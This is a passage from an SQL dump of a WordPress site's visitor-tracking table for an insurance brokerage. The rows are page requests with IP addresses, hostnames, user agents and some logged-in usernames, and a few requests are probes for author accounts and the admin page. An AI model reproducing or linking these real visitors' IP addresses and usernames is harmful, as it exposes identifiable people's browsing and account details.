-136.rdsnet.ro','/aig-releases-new-term-rates-and-re-enters-ny/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(23949,'0b_2c9e42576168d35f2e5160ebbea20538','1462254773','79.116.28.136','79-116-28-136.rdsnet.ro','/carriers','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(23952,'0b_2c9e42576168d35f2e5160ebbea20538','1462254774','79.116.28.136','79-116-28-136.rdsnet.ro','/carriers/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(23955,'0b_2c9e42576168d35f2e5160ebbea20538','1462254775','79.116.28.136','79-116-28-136.rdsnet.ro','/case-status','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(23957,'0b_2c9e42576168d35f2e5160ebbea20538','1462254776','79.116.28.136','79-116-28-136.rdsnet.ro','/case-status/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(23960,'0b_2c9e42576168d35f2e5160ebbea20538','1462254779','79.116.28.136','79-116-28-136.rdsnet.ro','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(23963,'0b_2c9e42576168d35f2e5160ebbea20538','1462254780','79.116.28.136','79-116-28-136.rdsnet.ro','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(23964,'0b_2c9e42576168d35f2e5160ebbea20538','1462254781','79.116.28.136','79-116-28-136.rdsnet.ro','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(23966,'0b_2c9e42576168d35f2e5160ebbea20538','1462254783','79.116.28.136','79-116-28-136.rdsnet.ro','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(23967,'0b_2c9e42576168d35f2e5160ebbea20538','1462254785','79.116.28.136','79-116-28-136.rdsnet.ro','/contact','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(23970,'0b_2c9e42576168d35f2e5160ebbea20538','1462254785','79.116.28.136','79-116-28-136.rdsnet.ro','/contact/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(23972,'0b_2c9e42576168d35f2e5160ebbea20538','1462254790','79.116.28.136','79-116-28-136.rdsnet.ro','/feed','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(23975,'0b_2c9e42576168d35f2e5160ebbea20538','1462254791','79.116.28.136','79-116-28-136.rdsnet.ro','/feed/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(23976,'0b_2c9e42576168d35f2e5160ebbea20538','1462254792','79.116.28.136','79-116-28-136.rdsnet.ro','/forms','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(23979,'0b_2c9e42576168d35f2e5160ebbea20538','1462254792','79.116.28.136','79-116-28-136.rdsnet.ro','/forms/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(23982,'0b_2c9e42576168d35f2e5160ebbea20538','1462254796','79.116.28.136','79-116-28-136.rdsnet.ro','/igo','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(23985,'0b_2c9e42576168d35f2e5160ebbea20538','1462254797','79.116.28.136','79-116-28-136.rdsnet.ro','/igo/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(23987,'0b_2c9e42576168d35f2e5160ebbea20538','1462254798','79.116.28.136','79-116-28-136.rdsnet.ro','/insentives','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(23988,'0b_2c9e42576168d35f2e5160ebbea20538','1462254799','79.116.28.136','79-116-28-136.rdsnet.ro','/insentives/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(23990,'0b_2c9e42576168d35f2e5160ebbea20538','1462254800','79.116.28.136','79-116-28-136.rdsnet.ro','/licensing-contracting','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(23993,'0b_2c9e42576168d35f2e5160ebbea20538','1462254801','79.116.28.136','79-116-28-136.rdsnet.ro','/licensing-contracting/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(23996,'0b_2c9e42576168d35f2e5160ebbea20538','1462254803','79.116.28.136','79-116-28-136.rdsnet.ro','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(23999,'0b_2c9e42576168d35f2e5160ebbea20538','1462254804','79.116.28.136','79-116-28-136.rdsnet.ro','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(24002,'0b_2c9e42576168d35f2e5160ebbea20538','1462254805','79.116.28.136','79-116-28-136.rdsnet.ro','/register','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(24003,'0b_2c9e42576168d35f2e5160ebbea20538','1462254806','79.116.28.136','79-116-28-136.rdsnet.ro','/register/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(24005,'0b_2c9e42576168d35f2e5160ebbea20538','1462254807','79.116.28.136','79-116-28-136.rdsnet.ro','/term-quotes','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(24006,'0b_2c9e42576168d35f2e5160ebbea20538','1462254808','79.116.28.136','79-116-28-136.rdsnet.ro','/term-quotes/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(24009,'0b_2c9e42576168d35f2e5160ebbea20538','1462254814','79.116.28.136','79-116-28-136.rdsnet.ro','/?page_id=169','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(24011,'0b_2c9e42576168d35f2e5160ebbea20538','1462254815','79.116.28.136','79-116-28-136.rdsnet.ro','/register/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(24014,'0b_2c9e42576168d35f2e5160ebbea20538','1462254816','79.116.28.136','79-116-28-136.rdsnet.ro','/comments/feed','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(24017,'0b_2c9e42576168d35f2e5160ebbea20538','1462254816','79.116.28.136','79-116-28-136.rdsnet.ro','/comments/feed/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(24018,'0b_2c9e42576168d35f2e5160ebbea20538','1462254817','79.116.28.136','79-116-28-136.rdsnet.ro','/home/feed','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(24021,'0b_2c9e42576168d35f2e5160ebbea20538','1462254818','79.116.28.136','79-116-28-136.rdsnet.ro','/home/feed/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(24023,'0b_2c9e42576168d35f2e5160ebbea20538','1462254819','79.116.28.136','79-116-28-136.rdsnet.ro','/about-us/feed','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(24026,'0b_2c9e42576168d35f2e5160ebbea20538','1462254819','79.116.28.136','79-116-28-136.rdsnet.ro','/about-us/feed/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(24027,'0b_2c9e42576168d35f2e5160ebbea20538','1462254820','79.116.28.136','79-116-28-136.rdsnet.ro','/about-us/meet-the-eib-team','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(24029,'0b_2c9e42576168d35f2e5160ebbea20538','1462254821','79.116.28.136','79-116-28-136.rdsnet.ro','/meet-the-eib-team/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(24030,'0b_2c9e42576168d35f2e5160ebbea20538','1462254822','79.116.28.136','79-116-28-136.rdsnet.ro','/meet-the-eib-team','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(24033,'0b_2c9e42576168d35f2e5160ebbea20538','1462254824','79.116.28.136','79-116-28-136.rdsnet.ro','/meet-the-eib-team/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(24035,'0b_2c9e42576168d35f2e5160ebbea20538','1462254825','79.116.28.136','79-116-28-136.rdsnet.ro','/agent-tools/feed','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(24038,'0b_2c9e42576168d35f2e5160ebbea20538','1462254826','79.116.28.136','79-116-28-136.rdsnet.ro','/aig-releases-new-term-rates-and-re-enters-ny/feed','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(24041,'0b_2c9e42576168d35f2e5160ebbea20538','1462254827','79.116.28.136','79-116-28-136.rdsnet.ro','/aig-releases-new-term-rates-and-re-enters-ny/feed/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(24044,'0b_2c9e42576168d35f2e5160ebbea20538','1462254827','79.116.28.136','79-116-28-136.rdsnet.ro','/carriers/feed','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(24045,'0b_2c9e42576168d35f2e5160ebbea20538','1462254828','79.116.28.136','79-116-28-136.rdsnet.ro','/carriers/feed/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(24048,'0b_2c9e42576168d35f2e5160ebbea20538','1462254829','79.116.28.136','79-116-28-136.rdsnet.ro','/case-status/feed','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(24050,'0b_2c9e42576168d35f2e5160ebbea20538','1462254829','79.116.28.136','79-116-28-136.rdsnet.ro','/case-status/feed/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(24053,'0b_2c9e42576168d35f2e5160ebbea20538','1462254830','79.116.28.136','79-116-28-136.rdsnet.ro','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/feed','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(24054,'0b_2c9e42576168d35f2e5160ebbea20538','1462254831','79.116.28.136','79-116-28-136.rdsnet.ro','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/feed/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(24057,'0b_2c9e42576168d35f2e5160ebbea20538','1462254832','79.116.28.136','79-116-28-136.rdsnet.ro','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/feed','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(24060,'0b_2c9e42576168d35f2e5160ebbea20538','1462254832','79.116.28.136','79-116-28-136.rdsnet.ro','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/feed/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(24062,'0b_2c9e42576168d35f2e5160ebbea20538','1462254833','79.116.28.136','79-116-28-136.rdsnet.ro','/contact/feed','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(24065,'0b_2c9e42576168d35f2e5160ebbea20538','1462254834','79.116.28.136','79-116-28-136.rdsnet.ro','/contact/feed/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(24066,'0b_2c9e42576168d35f2e5160ebbea20538','1462254834','79.116.28.136','79-116-28-136.rdsnet.ro','/igo/feed','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(24068,'0b_2c9e42576168d35f2e5160ebbea20538','1462254835','79.116.28.136','79-116-28-136.rdsnet.ro','/igo/feed/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(24069,'0b_2c9e42576168d35f2e5160ebbea20538','1462254837','79.116.28.136','79-116-28-136.rdsnet.ro','/licensing-contracting/feed','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(24072,'0b_2c9e42576168d35f2e5160ebbea20538','1462254838','79.116.28.136','79-116-28-136.rdsnet.ro','/licensing-contracting/feed/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(24075,'0b_2c9e42576168d35f2e5160ebbea20538','1462254838','79.116.28.136','79-116-28-136.rdsnet.ro','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/feed','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(24078,'0b_2c9e42576168d35f2e5160ebbea20538','1462254839','79.116.28.136','79-116-28-136.rdsnet.ro','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/feed/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(24081,'0b_2c9e42576168d35f2e5160ebbea20538','1462254839','79.116.28.136','79-116-28-136.rdsnet.ro','/register/feed','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(24084,'0b_2c9e42576168d35f2e5160ebbea20538','1462254840','79.116.28.136','79-116-28-136.rdsnet.ro','/register/feed/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(24086,'0b_2c9e42576168d35f2e5160ebbea20538','1462254841','79.116.28.136','79-116-28-136.rdsnet.ro','/term-quotes/feed','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(24089,'0b_2c9e42576168d35f2e5160ebbea20538','1462254842','79.116.28.136','79-116-28-136.rdsnet.ro','/term-quotes/feed/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(24090,'0b_2c9e42576168d35f2e5160ebbea20538','1462254843','79.116.28.136','79-116-28-136.rdsnet.ro','/meet-the-eib-team/feed','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(24093,'0b_2c9e42576168d35f2e5160ebbea20538','1462254844','79.116.28.136','79-116-28-136.rdsnet.ro','/meet-the-eib-team/feed/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(24096,'0b_2dbdb35f9dd86929180be618cd052bd4','1462256168','130.185.155.74','130.185.155.74','/?author=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(24098,'0b_2dbdb35f9dd86929180be618cd052bd4','1462256178','130.185.155.74','130.185.155.74','/author/admin/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(24101,'0b_2dbdb35f9dd86929180be618cd052bd4','1462256188','130.185.155.74','130.185.155.74','/?author=2','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(24102,'0b_7cf77ca9a4ff94ab64e96a7e0e2fcd0d','1462257401','207.46.13.34','msnbot-207-46-13-34.search.msn.com','/quotes.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(24105,'0b_cf703be2d00029e6bc604f555be16b55','1462258605','46.118.116.239','sol-fttb.239.116.118.46.sovam.net.ua','/','Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1; SV1; .NET CLR 1.1.4322)','http://dear-diary.ru/','',0,'WinXP','AOL 1','ua','','','','','','','0','0',0),(24108,'0b_a6a1a3eec408c8ae24445487d380c22d','1462259646','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(24111,'0b_d6c3be3f0c2b0de6b3d26ca24503a07a','1462260397','207.46.13.127','msnbot-207-46-13-127.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(24113,'0b_79ddd9534de82e7589aeda457301cf3b','1462261965','207.46.13.34','msnbot-207-46-13-34.search.msn.com','/paramed.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(24114,'0b_a93892f2faf0569393e83c9b055223d2','1462263875','207.46.13.34','msnbot-207-46-13-34.search.msn.com','/forms/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(24117,'0b_b096cf40c6b3ac8a413882aabf7cf08f','1462265443','208.115.111.66','208-115-111-66-reverse.wowrack.com','/forms/feed/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(24120,'0b_8cb3319c35c14056d30f0ba6915ac697','1462270290','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(24122,'0b_01488081e5f556cdd303c809d0a5b4d4','1462272818','37.115.190.10','37-115-190-10-broadband.kyivstar.net','/contact/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','','',0,'Win7','Chrome 41','','','','','','','','0','0',0),(24123,'0b_f3a3e9649f649c9021321d658587a9b0','1462275147','100.43.81.146','spider-100-43-81-146.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(24125,'0b_dd5ba641130b282d469771a69443c68e','1462275147','141.8.143.235','spider-141-8-143-235.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(24128,'0b_f3a3e9649f649c9021321d658587a9b0','1462275150','100.43.81.152','spider-100-43-81-152.yandex.com','/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(24131,'0b_dd5ba641130b282d469771a69443c68e','1462275151','141.8.143.235','spider-141-8-143-235.yandex.com','/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(24134,'0b_ab7cd55f7f203906a823df8c761f383e','1462275903','198.46.233.178','198-46-233-178-host.colocrossing.com','/register/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(24137,'0b_8edd89c59b3db3d5a7efc2592d8425c3','1462277397','5.248.253.133','5-248-253-133-broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)','http://allkrim.com/','',0,'Windows','IE 6','','','','','','','','0','0',0),(24140,'0b_8edd89c59b3db3d5a7efc2592d8425c3','1462277398','5.248.253.133','5-248-253-133-broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)','http://allkrim.com/','',0,'Windows','IE 6','','','','','','','','0','0',0),(24141,'0b_832a4bdb1f49ce05448427bef2f809e2','1462278222','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(24144,'0b_72ed7f4c066428cce8413341ecd933de','1462278264','207.46.13.97','msnbot-207-46-13-97.search.msn.com','/SSO/235_11.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(24147,'0b_5dcc838f907650ce0bf5507bd9a166ef','1462280313','24.186.240.34','ool-18baf022.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','1600 x 900','','','','akepecs','','0','0',0),(24150,'0b_5dcc838f907650ce0bf5507bd9a166ef','1462280315','24.186.240.34','ool-18baf022.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1600 x 900','','','','akepecs','','0','0',0),(24153,'0b_5dcc838f907650ce0bf5507bd9a166ef','1462280317','24.186.240.34','ool-18baf022.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1600 x 900','','','','akepecs','','0','0',0),(24156,'0b_5dcc838f907650ce0bf5507bd9a166ef','1462280409','24.186.240.34','ool-18baf022.dyn.optonline.net','/igo/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 50','us','1600 x 900','','','','akepecs','','0','51',0),(24158,'0b_98bd17797f6e0bc7bbd10e6c83c926c3','1462281183','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(24161,'0b_98bd17797f6e0bc7bbd10e6c83c926c3','1462281185','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(24164,'0b_000dfcacad8f3607ca60d9df739d1e08','1462281748','91.206.4.194','91-206-4-194.faust.net.ua','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:15.0) Gecko/20121011 Firefox/15.0.2','','',0,'Win7','Firefox 15','ua','','','','','','','0','0',0),(24167,'0b_98bd17797f6e0bc7bbd10e6c83c926c3','1462281940','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(24168,'0b_d9c0b5728c83cd227c21ec09ef220fd9','1462281960','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(24171,'0b_d9c0b5728c83cd227c21ec09ef220fd9','1462281961','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(24174,'0b_d9c0b5728c83cd227c21ec09ef220fd9','1462281966','108.58.88.178','ool-6c3a58b2.static.optonline.net','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(24176,'0b_d9c0b5728c83cd227c21ec09ef220fd9','1462281981','108.58.88.178','ool-6c3a58b2.static.optonline.net','/life-product-search/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/carriers/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','roisy','','0','51',0),(24179,'0b_d9c0b5728c83cd227c21ec09ef220fd9','1462282114','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/carriers/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','roisy','','0','51',0),(24180,'0b_d9c0b5728c83cd227c21ec09ef220fd9','1462282122','108.58.88.178','ool-6c3a58b2.static.optonline.net','/life-product-search/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','roisy','','0','51',0),(24183,'0b_d9c0b5728c83cd227c21ec09ef220fd9','1462283359','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/life-product-search/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','roisy','','0','51',0),(24185,'0b_f9431b6bd5426a44c44c9a59accd6c02','1462283956','66.249.64.34','crawl-66-249-64-34.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(24188,'0b_156aee6abe88f2ad744cc8bf938184c6','1462284282','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(24189,'0b_156aee6abe88f2ad744cc8bf938184c6','1462284283','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(24191,'0b_156aee6abe88f2ad744cc8bf938184c6','1462284292','108.58.88.178','ool-6c3a58b2.static.optonline.net','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(24192,'0b_156aee6abe88f2ad744cc8bf938184c6','1462284308','108.58.88.178','ool-6c3a58b2.static.optonline.net','/life-product-search/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/carriers/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','roisy','','0','51',0),(24194,'0b_b0a13d3bafab4b91b681499a7220ef87','1462284962','68.194.47.151','ool-44c22f97.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'WinXP','Chrome 49','us','','','','','','','0','0',0),(24195,'0b_de313eb256a62a7bd02d5f2e8bbdf67e','1462287511','98.14.102.124','cpe-98-14-102-124.nyc.res.rr.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 49','us','1280 x 1024','Google','','','','','0','0',0),(24197,'0b_de313eb256a62a7bd02d5f2e8bbdf67e','1462287515','98.14.102.124','cpe-98-14-102-124.nyc.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1280 x 1024','','','','','','0','0',0),(24198,'0b_40a818377e6fd4473d837820e9dcafd0','1462287675','184.154.139.23','placeholder.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(24201,'0b_40a818377e6fd4473d837820e9dcafd0','1462287684','184.154.139.23','placeholder.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(24204,'0b_40a818377e6fd4473d837820e9dcafd0','1462287687','184.154.139.23','placeholder.sitelock.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(24206,'0b_40a818377e6fd4473d837820e9dcafd0','1462287690','184.154.139.23','placeholder.sitelock.com','/agent-tools/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(24207,'0b_40a818377e6fd4473d837820e9dcafd0','1462287692','184.154.139.23','placeholder.sitelock.com','/term-quotes/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(24210,'0b_57f461c351784b7734f0d91e613466dc','1462288500','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like 